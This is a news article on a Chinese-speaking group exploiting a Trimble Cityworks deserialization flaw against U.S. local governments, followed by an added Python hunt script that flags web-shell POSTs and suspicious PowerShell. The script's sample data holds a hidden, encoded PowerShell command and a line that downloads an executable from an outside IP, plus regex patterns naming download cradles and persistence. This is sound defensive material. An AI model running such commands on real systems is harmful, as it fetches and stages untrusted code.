Chinese Hackers Exploit Trimble Cityworks Flaw to Infiltrate U.S. Government Networks
Published on May 22, 2025
A Chinese-speaking threat actor known as UAT-6382 has been linked to active exploitation of a high-severity remote code execution vulnerability in Trimble Cityworks, a widely used GIS-centric asset management system. The campaign appears to have begun in early 2025 and primarily targets local government networks in the United States.
The vulnerability, tracked as CVE-2025-0944 (CVSS score: 8.6), stems from unsafe deserialization of untrusted data and has since been patched. When exploited, it allowed attackers to execute arbitrary code remotely. The flaw was later added to the U.S. government's catalog of known exploited vulnerabilities.
Exploitation Workflow and Payloads
After gaining initial access via the Cityworks flaw, the attackers moved quickly to conduct internal reconnaissance. They deployed a series of web shells and custom malware to establish long-term access and further their objectives. Tools observed in this campaign included:
- Cobalt Strike, a well-known post-exploitation tool
- VShell, a Go-based remote access tool
- Web shells such as AntSword, Chopper, and Behinder, often used by Chinese-linked threat groups
The attackers also employed a Rust-based loader, dubbed TetraLoader, designed to deliver payloads like Cobalt Strike. This loader was reportedly built using MaLoader, an open-source malware-building framework.
Objectives and Tactics
Once inside the networks, UAT-6382 appeared particularly interested in utility management systems. The group reportedly enumerated directories to locate sensitive or valuable files and used previously deployed web shells to exfiltrate the data.
PowerShell was used extensively to deploy additional backdoors, supporting long-term persistence and further exploitation of compromised systems.
Summary
This campaign underscores the growing sophistication of threat actors leveraging newly disclosed vulnerabilities in industry-specific software. It also highlights the importance of timely patching and proactive monitoring for anomalous activity, particularly in public sector and infrastructure-related networks.
Organizations using Cityworks or similar platforms are strongly encouraged to ensure that all security updates have been applied and to audit their environments for any signs of compromise.
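The audit the article recommends comes down to two questions a defender can answer from existing telemetry: are server-side script files outside the known application baseline receiving repeated POST traffic (the access pattern of web shells such as those named above), and do PowerShell script-block logs show encoded commands, hidden windows, download cradles or persistence mechanisms of the kind used to stage backdoors? The script below is an added illustration written for this page; it is not code from the article, from Cisco Talos or from Trimble. The log lines, the script-path baseline, the indicator regexes and the IP addresses are all constructed or assumed, and a real deployment would read IIS W3C logs and Windows Event ID 4104 records instead of the inline samples.

```python
"""Hypothetical hunt helpers (added example): flag web-shell-like POST traffic
in IIS-style access logs and suspicious PowerShell script blocks.
All data below is constructed for illustration."""
import re
from collections import defaultdict

# Constructed W3C-style lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
IIS_LOG = """\
2025-02-03 10:01:11 203.0.113.5 GET /cityworks/Login.aspx - 200 Mozilla/5.0
2025-02-03 10:02:40 203.0.113.5 POST /cityworks/Login.aspx - 302 Mozilla/5.0
2025-02-03 10:05:02 198.51.100.7 POST /cityworks/upload/tmp1.aspx - 200 python-requests/2.31
2025-02-03 10:05:09 198.51.100.7 POST /cityworks/upload/tmp1.aspx - 200 python-requests/2.31
2025-02-03 10:06:31 198.51.100.7 POST /cityworks/upload/tmp1.aspx - 200 python-requests/2.31
2025-02-03 10:07:00 192.0.2.9 GET /cityworks/images/logo.png - 200 Mozilla/5.0
"""

# Hypothetical baseline: script paths that legitimately accept POSTs.
# In practice this comes from the application's install manifest.
KNOWN_SCRIPTS = {"/cityworks/Login.aspx"}

# Server-side script extensions a dropped web shell would typically use.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|php|jsp)$", re.IGNORECASE)


def parse_iis(text):
    """Parse constructed W3C-style lines into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        _date, _time, ip, method, uri, _query, status = parts[:7]
        ua = " ".join(parts[7:])  # user agent may contain spaces
        records.append({"ip": ip, "method": method, "uri": uri,
                        "status": status, "ua": ua})
    return records


def flag_webshell_posts(records, baseline, min_posts=2):
    """Return {uri: {ips}} for script paths outside the baseline that received
    at least min_posts POST requests from the same source address."""
    counts = defaultdict(lambda: defaultdict(int))
    for r in records:
        if r["method"] != "POST" or not SCRIPT_EXT.search(r["uri"]):
            continue
        if r["uri"] in baseline:
            continue
        counts[r["uri"]][r["ip"]] += 1
    return {uri: {ip for ip, n in ips.items() if n >= min_posts}
            for uri, ips in counts.items()
            if any(n >= min_posts for n in ips.values())}


# Constructed script-block texts in the style of PowerShell Event ID 4104.
# The base64 string is a placeholder, not a real payload.
PS_BLOCKS = [
    "Get-ChildItem C:\\inetpub\\wwwroot -Recurse",
    "powershell -nop -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANQA=",
    "Invoke-WebRequest -Uri http://203.0.113.55/agent.exe -OutFile C:\\Windows\\Temp\\svc.exe",
]

# Assumed indicator set; tune to the environment to keep false positives down.
PS_INDICATORS = {
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"(Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer"
        r"|Invoke-Expression|\bIEX\b)", re.I),
    "persistence": re.compile(
        r"(Register-ScheduledTask|New-Service|schtasks|HKLM:\\.*\\Run)", re.I),
}


def flag_powershell(blocks):
    """Return [(block, [indicator names])] for blocks matching any indicator."""
    findings = []
    for block in blocks:
        hits = [name for name, rx in PS_INDICATORS.items() if rx.search(block)]
        if hits:
            findings.append((block, hits))
    return findings


if __name__ == "__main__":
    for uri, ips in flag_webshell_posts(parse_iis(IIS_LOG), KNOWN_SCRIPTS).items():
        print(f"possible web shell: {uri} posted to by {sorted(ips)}")
    for block, hits in flag_powershell(PS_BLOCKS):
        print(f"suspicious PowerShell [{', '.join(hits)}]: {block[:60]}")
```

The web-shell check deliberately ignores the User-Agent: shells such as AntSword can set any header, so the durable signal is a script path that the application never shipped receiving repeated POSTs. The plain directory listing in the first PowerShell block does not fire, which is intentional; enumeration commands are also routine administration, and flagging them alone would bury the encoded and download-cradle hits that matter.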
Visit: Wired Geist